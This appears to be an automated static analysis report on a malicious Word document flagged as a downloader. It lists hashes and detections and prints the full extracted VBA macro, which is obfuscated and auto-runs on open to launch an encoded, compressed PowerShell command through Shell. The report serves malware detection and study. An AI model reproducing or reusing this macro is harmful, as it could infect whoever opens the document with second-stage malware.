Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0379902c61a0670d…

MALICIOUS

Office (OLE)

105.2 KB Created: 2018-06-11 21:08:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 8506e802d0aa1ffbf7f431a54052f643 SHA-1: 3581b13699956972944bfa7cbe88e2b3bd564e44 SHA-256: 0379902c61a0670d934e92f42935282db45b0c54a56b815d23a533febb14beb0
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a Shell command, which is obfuscated but appears to be constructing a PowerShell command. This command is likely used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0'.

Heuristics 7

  • ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ULkCq = PiIKPD
    AaRBNziW = XwvKHhpOVzE + Shell(GsuJP + Chr(hIhXXfDhvk + vbKeyP + XjGuSR) + "owers" + hBAQsRm + wjPvqYE + dwoOaCwcU + WatdmvYH, 8056 - 8056)
    iCEWtX = CLng(53277 * CSng(kinzi + ChrB(lOSmwG + CInt(22784))))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10081 bytes
SHA-256: 0dabfea2b1c1c9e1229e203fc7fd7df22807ff9a3f5f6b49fd65c0b70d021512
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wrHTzIzaLvcjJq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AaRBNziW()
On Error Resume Next
jiZkqt = CLng(16140 * CSng(trzHqU + ChrB(mfdKf + CInt(2920))))
cBsjJm = Int(fQivlv)
lJrrp = iXZpMF
IpLzYq = CYsKkW
OaRME = KBVlS
BGEbCT = vWpFj
uzHNR = CLng(62986 * CSng(SzQzI + ChrB(HjjHTZ + CInt(62297))))
pszwpr = Int(afYUhp)
bCoEF = XEpHS
MXPPV = CnFFJQ
pasRrc = nzEdSP
ULkCq = PiIKPD
AaRBNziW = XwvKHhpOVzE + Shell(GsuJP + Chr(hIhXXfDhvk + vbKeyP + XjGuSR) + "owers" + hBAQsRm + wjPvqYE + dwoOaCwcU + WatdmvYH, 8056 - 8056)
iCEWtX = CLng(53277 * CSng(kinzi + ChrB(lOSmwG + CInt(22784))))
cVCTnM = Int(SiBoo)
lsikvn = kjzEL
iQpXTz = wZjTZk
ESwlJ = vAWkCB
GwvYw = BiucK
End Function
Sub Autoopen()
On Error Resume Next
rLzLIO = CLng(19881 * CSng(YARkL + ChrB(VpduFV + CInt(34602))))
VwiLVS = Int(jKqlDS)
woNVrp = GjKMDl
EAWoQ = qAjzt
crqawH = rsojjd
kOSUwS = WcJTzn
AaRBNziW
owIPc = CLng(633 * CSng(CQFLF + ChrB(tTPTnL + CInt(77243))))
biMwbK = Int(PjGBT)
DwjRH = OiwMIt
nDMqjl = dNOvQA
HmkwJl = qXjCf
ZtcVDF = WCCqaP
End Sub


Attribute VB_Name = "uphkAGnGvN"
Function hBAQsRm()
On Error Resume Next
EzIkEo = CLng(70640 * CSng(YWBIE + ChrB(wJFViB + CInt(12455))))
JtMCqE = Int(HJrKu)
nFdYIu = cmTKJC
rovVOc = qPXBw
CRNJwK = JEbza
LHWZC = ocfSNW
bsNLWBOh = "HeLL " + "-e IABJAG4AVgB" + "vAGsAZQAt" + "AGUAeA" + "BwAH" + "IAZ"
RUwpGW = CLng(19491 * CSng(sKZKM + ChrB(ARmNwu + CInt(15236))))
NTpVJ = Int(EWzzn)
shMOV = QsTzzP
tnKtFP = oBHdAk
AKVKZ = KGSEX
XiPwQV = jQWtd
QvbmihZz = "QBzAFM" + "AaQBvAG4AIAAo" + "AE4ARQB3AC" + "0Ab" + "wBCAGoAZ" + "QBjAFQAIA" + "Bz" + "AFkAUwBUAEUAbQ"
kMNraj = CLng(27775 * CSng(NQiwmY + ChrB(imVFVN + CInt(84293))))
YEqHaE = Int(dQsQpK)
PsVJGK = hwdzh
dBnHj = Ppmjbo
QmRFVi = hXckMG
irGMKt = Tcdlk
WWHTjc = "AuAEkAbwAu" + "AHMAdABy" + "AGUAQQBtAH" + "IAZQBB" + "AEQAZQ" + "ByACgAI" + "AAoACAATgB" + "FAHcALQBvAEIAag"
vHcItV = CLng(51776 * CSng(cQsIOw + ChrB(FYCua + CInt(21098))))
wjWRud = Int(JnUllm)
vUrrfm = bNEvu
OEbqJm = Jvlba
wScYXd = uKELC
YaWTSW = uiFMd
EDuCYiLYm = "BlAGMAVAA" + "gAGkAbwA" + "uAGMAbwBN" + "AHA"
zYQziP = CLng(33742 * CSng(onwohS + ChrB(oDAPoP + CInt(26843))))
mcTFZD = Int(NQuvd)
dLVvlM = nYilDR
iFwpM = kdWPKr
Xaiulo = LsiTDC
AOziBI = lHTFjs
QJlFpGjFQ = "AcgBlAFMAU" + "wBJ" + "AG8AbgAuAGQA" + "ZQBGAEwAY" + "QB0" + "AGUAcwBU" + "AHI" + "AZQB"
zoGlt = CLng(65384 * CSng(NpkzO + ChrB(umadm + CInt(17387))))
kOZjI = Int(jmSPoC)
sLDXiJ = RnZNj
mDwjqT = kRlPZc
BauZv = SdjjCu
opzpLz = zdnlZ
SWqECRmaP = "BAE0AKAAg" + "AFsASQBvAC4AbQB" + "lAG0AT" + "wBSAHkAUwBUAH" + "IARQBB" + "AG0AXQAgAFsA"
cLaao = CLng(96333 * CSng(zTrsz + ChrB(mUIUP + CInt(57578))))
qmuUvD = Int(GNYmIA)
UGDJvE = dUwFqu
BoJXH = fpQGik
wlvEj = rRNELU
FMRwP = IRFYP
AYNzVB = "YwBPAG4AVgBlAFI" + "AdA" + "BdA" + "Do" + "AOgBmAFIAT" + "wB"
AWuiq = CLng(94509 * CSng(KirrYt + ChrB(rDtok + CInt(95942))))
iYSXU = Int(ZbEsNj)
jcwmXH = KqNUtC
NFXQoR = SzbHW
Eiiwi = EmOHGR
QssLwi = wMWhc
dGNWOtVXM = "tAGIAY" + "QBzAG" + "UANg" + "A0AFMAVA" + "ByAEkAbgBHACgA"
PcQfU = CLng(60901 * CSng(BcbLO + ChrB(AwIwwR + CInt(98736))))
AUZld = Int(FJrMzW)
cbVjn = QboRjw
dSoNX = cNPIr
qDvskO = skYXn
LqikL = spVzm
OkCrHV = "JwBWAFoAQgBo" + "AFQAOAB" + "JAHcARQBJ" + "AGIALwBTAG" + "oAOAB" + "zAEcAVQ"
hBAQsRm = bsNLWBOh + QvbmihZz + WWHTjc + EDuCYiLYm + QJlFpGjFQ + SWqECRmaP + AYNzVB + dGNWOtVXM + OkCrHV
End Function
Function wjPvqYE()
On Error Resume Next
dohtr = CLng(26301 * CSng(dqwXV + ChrB(DCREXF + CInt(90734))))
wMZud = Int(FwEVD)
XGZhw = KDJYOS
BIAbk = trSfbH
NKOimb = MLwcj
dvrsa = GjcuEX
PErwoQdio = "BS" + "AHAATgBXAEMA" + "SQB" + "MAGkAWQBL" + "AG8A" + "aA" + "Bn" + "AE" + "QA" + "QQBrAE8A"
XKQEb = CLng(95618 * CSng(wjApim + ChrB(wBpLYr + CInt(59771))))
wAaEd = Int(TlPJH)
EJvGU = JHzvBN
LIfmjj = oCLQdX
Zfvkf = TjpFi
shYXDw = RSsnw
DDfzm = "UgB4AE0AUgAwAD" + "MAYwBFA" + "EsAWABUAHUA" + "NwAy" + "ADQAWQBTAC8Ac" + "gB" + "zADEAQQBv"
dbiBzf = CLng(55971 * CSng(KkbCKW + ChrB(TcSZEs + CInt(75697))))
QfIRQF = Int(jrwEC)
ohraFs = zwVtcW
qZOunq = OWpNMs
DjFFT = fubzwz
ATKPp = ILHdCR
OfsAAO = "AGwAZgB" + "MAHIAbAA" + "3AG4AOAB0ADcAO" + "QAzAHEAZ" + "gA1AGQAdAB0AD" + "EAaQBYAFg" + "AUgBFAFAAVgBN" + "AE4ARQ" + "BLAEIAQgBMAEwAZ"
TZLCN = CLng(86824 * CSng(YuMPn + ChrB(cSvwP + CInt(91351))))
kbvLaY = Int(jzvGC)
IbFiZm = zjGGu
jRqPJO = dbriz
paQawG = zABMM
dpoEV = RwrAti
KcbndBjWSvm = "ABXAHo" + "AUwB3AEoAc" + "wAvAEYA" + "Tg" + "BQAHkAdgB"
svKjja = CLng(68067 * CSng(ziiFHA + ChrB(cjQdCk + CInt(70895))))
pWVpi = Int(zZXsLO)
oTRmd = jLFwNp
VLkQjC = iUKOl
TzFLN = mRoMzr
IEFkY = AwImp
whjMsKYRc = "4AFIAKwA1" + "AFEAZ" + "wBwAEgAUQB" + "MAFMA" + "Rw"
MJGlU = CLng(18015 * CSng(AcIjG + ChrB(lRDShw + CInt(72375))))
HtCYk = Int(FlCLMP)
AmffT = vqwAX
pmqzja = DhFQDN
XzOZwT = qkfXnN
piKsiZ = zPoWkZ
kLrvaFH = "BVAFI" + "AZABK" + "AFUARgBqADQAS" + "wA" + "xA" + "Eg" + "AMwA0AHQAM" + "AA1AGsAZw"
wjPvqYE = PErwoQdio + DDfzm + OfsAAO + KcbndBjWSvm + whjMsKYRc + kLrvaFH
End Function
Function dwoOaCwcU()
On Error Resume Next
WvVcS = CLng(69801 * CSng(wcWDEJ + ChrB(BLZtMr + CInt(26514))))
uXYnoX = Int(aDMudU)
JvVdPq = ooaPw
DOdXhw = AzDiv
QCSrJ = iMBiXj
WtGizY = ZiLaoN
zwSUBSMZsz = "AvAFEAY" + "wB5AHUARwBGAH" + "UAcgBJAGs" + "AOQBC" + "AGc" + "AcQBVAHgAcw" + "BFAHYAWgA3ADAA"
zoLsrh = CLng(13811 * CSng(EVzRjS + ChrB(BkFoFb + CInt(57196))))
PFFEim = Int(rDwAjY)
ljBVwp = ljoYoc
VzHDTt = mldYoN
uUimML = YmkfoJ
YRfuJQ = DozMi
QXfWVh = "OQA" + "2AF" + "MAWgB2A" + "GQANwBGAFgASQBo" + "AFQA" + "RQBJA" + "E4AcQ" + "BlAD" + "IAWQB"
zvYwIb = CLng(15158 * CSng(MFmcRb + ChrB(NXXfkS + CInt(26769))))
zifwH = Int(fkZiRz)
NnWMBm = LsSrp
qRZht = lbbSdf
AjVNu = bUzkAS
jBIFMn = iAOKr
zsRmp = "GAFAAZABlAFk" + "AawA2AGw" + "AMABlAHgAc" + "QBpAG8AcQBMAEUA"
rOAmUt = CLng(65199 * CSng(lfqiY + ChrB(NEqjZP + CInt(18527))))
jTWGpX = Int(ASKWF)
NUNPH = jvVSao
tiJhlb = zihQOD
hkNfI = iAkdR
fawOB = Sudork
jMffnOYbYnu = "QQBzAEwARgA4AGc" + "AMQBZA" + "EEAc" + "wAz" + "AEUAeQBlAG8AdQA"
uaLjm = CLng(94539 * CSng(DZBLI + ChrB(RVMttf + CInt(31009))))
wEwQj = Int(wJjtt)
HOrXRz = QOFYnF
iwhku = UEwVM
GdEtt = SffCd
cwzzFq = LKRozc
wBSlYzzXqoA = "2AFIASwBFADM" + "ATQBLADQAagBv" + "AEsAb" + "QBPAHQAMQA" + "zAGwAbgB"
whICQW = CLng(20143 * CSng(qDLUMQ + ChrB(ajcTr + CInt(14320))))
MUwHpB = Int(poFRz)
kXcmH = iGwnli
qkhMj = oBVnEI
JpAOGD = GkDHp
McrPh = cZKYH
CPczdwPj = "GAHAAYgB4AGgA" + "VABxAHE" + "AQwBB" + "AHEARQBTAFIAZgB" + "HAGMAcQ" + "BXAG8AVg" + "BxAHgAcA" + "Bi" + "AFQAbQBm" + "AGgAYQBiADU"
ZjIIPj = CLng(45960 * CSng(aVoFhh + ChrB(PJGjaX + CInt(39418))))
LJFGq = Int(HzRtmh)
GwVTj = lromh
fMPDrh = EIwwJ
jzTWXM = ALJLlM
LjjXXY = LTrvZ
IHvztLdSC = "AeQ" + "BIAHcAY" + "QBaAGsAc" + "ABpAHoAYgAvAHg" + "ANgA0AEcAMw" + "Aw" + "AHMAWABRAGMAb" + "gBlADEAOQB4AGUA"
icNKz = CLng(22848 * CSng(CORUQZ + ChrB(zUDESf + CInt(82952))))
VcYblW = Int(dbawA)
XzwMZ = nwRLH
lHrPmd = UoHllX
ThkptS = ZbWEs
IDwDRQ = zPiOoz
EpwwMVq = "QwA" + "4ADkAcABn" + "ADcAZg" + "B5AFUAbgBM" + "AGYAUAB" + "tAHEAMAB6A" + "FIANAB5AGY" + "Ae" + "QAvAFgAdAA0" + "AEoAYwBB"
jYQMM = CLng(77845 * CSng(CGMcRp + ChrB(MfULu + CInt(69305))))
RsDUVt = Int(EDWAwO)
AKKrDu = wjbzb
mjJDu = SPfMs
uWzDqb = bfMVJ
qpfUI = UtnpVt
wYIKzho = "AFgAVg" + "A2ADUAe" + "AB6AE4AeQBRAHY" + "AeAAzADMAO" + "QBYAEQAdA" + "B1AHMAcABi" + "AE0AQQBQAG" + "4AQwBGAHc"
GivdU = CLng(95779 * CSng(AJXIt + ChrB(zizaZN + CInt(99572))))
EYnuXk = Int(zHhcJ)
VnfBr = rThSW
PcquMP = tjCJI
zNuCBq = jWiqUZ
qIQWGQ = IHhDu
pHPqCZw = "AawBkAFMAOABmAG" + "oAZwB" + "lAEQAWQBuAFUA" + "WgBCADkATAB" + "mAFkAdgAyAGEA" + "LwBzAFgASgB" + "yADAAegBsAFYAYQ" + "BHAHgALwBkAFMAd"
dwoOaCwcU = zwSUBSMZsz + QXfWVh + zsRmp + jMffnOYbYnu + wBSlYzzXqoA + CPczdwPj + IHvztLdSC + EpwwMVq + wYIKzho + pHPqCZw
End Function
Function WatdmvYH()
On Error Resume Next
UQnTd = CLng(44256 * CSng(tJwRf + ChrB(psswzZ + CInt(75082))))
RlSfDs = Int(pGNwG)
LTjLN = HojMzq
abQJid = jDiUn
iCEDi = ZCiZI
lcfskY = oZRoZ
qwkqIX = "wBSADYAbABVAH" + "gATwBpAGw" + "AWABwAFoAcQA1A" + "CsAUwB" + "2AFcAVQ" + "A5AEMASgBGAGIA" + "YgBJAHkAcwBFAF" + "oARABuAGgAMwB" + "FAFE" + "ATw"
iUwpIo = CLng(28585 * CSng(nSFkc + ChrB(jRbwCH + CInt(44394))))
BcrTGB = Int(ANNiHE)
aNVktO = KaIHvm
zVmSZ = TWzphN
mFrFV = irOaR
IwqBi = KPcDs
wiVjvi = "BZA" + "DkAM" + "QBzAEIATQBjAFIA" + "YgBLAHQAcg" + "BFAFIA" + "bwBKAEM" + "AWgBIADQAbgAz" + "AF" + "EAMwBrAFoAQ"
MiWfDP = CLng(62783 * CSng(jqLFi + ChrB(mVDfj + CInt(89481))))
EQjcU = Int(iWzvj)
QsnCC = wtOhSn
TfYpLz = zFIRn
iACji = bsSKzT
rlAHW = vqBkFh
wmZNIT = "QBo" + "AHQASgBvAE8A" + "bgBBAGIA" + "ZgBBAG4AQgBiAH" + "YAYwBEACcAKQA" + "gACwAI" + "ABb" + "AE" + "kAbwAuAGM" + "Abw"
wPPKkW = CLng(29641 * CSng(FwrhwX + ChrB(sAUYV + CInt(20747))))
izwlS = Int(MjPwww)
MdHadD = lnJZY
kwAQhL = shSLwD
nYiuj = bzPsu
SJUvnZ = rHOfz
NmpDqiGdsX = "BNAFAAc" + "gBlAHMAUwBJA" + "E8AbgAuAEMA" + "bwBNAHAAUgB" + "FAHMAcwB" + "JAE8ATgBtAG8" + "ARA"
mVDfK = CLng(92679 * CSng(ZjNNEO + ChrB(VwkiIV + CInt(73113))))
RXliml = Int(QZsji)
jYUFwS = mvHqY
rsWfXd = sDjtjJ
NPoUVk = paQdLC
HVQuF = tTttU
lMPawYzqR = "BFAF" + "0AOgA6A" + "GQ" + "AZQBDAG" + "8ATQBwAF" + "IAZ" + "QBTAFMAI"
AEdra = CLng(47876 * CSng(cHWHmV + ChrB(pCRFCL + CInt(51706))))
liQwa = Int(ztVuz)
koMjp = YaJlO
ZRNrCn = IinTvb
wjfNAM = FEBqiQ
nADzUm = JsGri
BPkdoRS = "AApACAA" + "KQAgACwAW" + "wB0AEUA" + "WABUAC4AZQ" + "BuAGMA" + "bwBkAGkATgBnAF" + "0AOgA6AG"
rlwVR = CLng(13886 * CSng(Gsvvk + ChrB(qTMMA + CInt(38247))))
sVijT = Int(pConZW)
IvTHf = bCsuE
OSvFw = FXKLVH
CpRLR = WZSsv
EhbsV = aZcEI
zYsnqaSl = "EAUwBjAEkASQAp" + "ACAAKQAuAFIA" + "ZQBBAEQAdABvAGU" + "ATgBEACgAIAAp" + "AA=="
WatdmvYH = qwkqIX + wiVjvi + wmZNIT + NmpDqiGdsX + lMPawYzqR + BPkdoRS + zYsnqaSl
End Function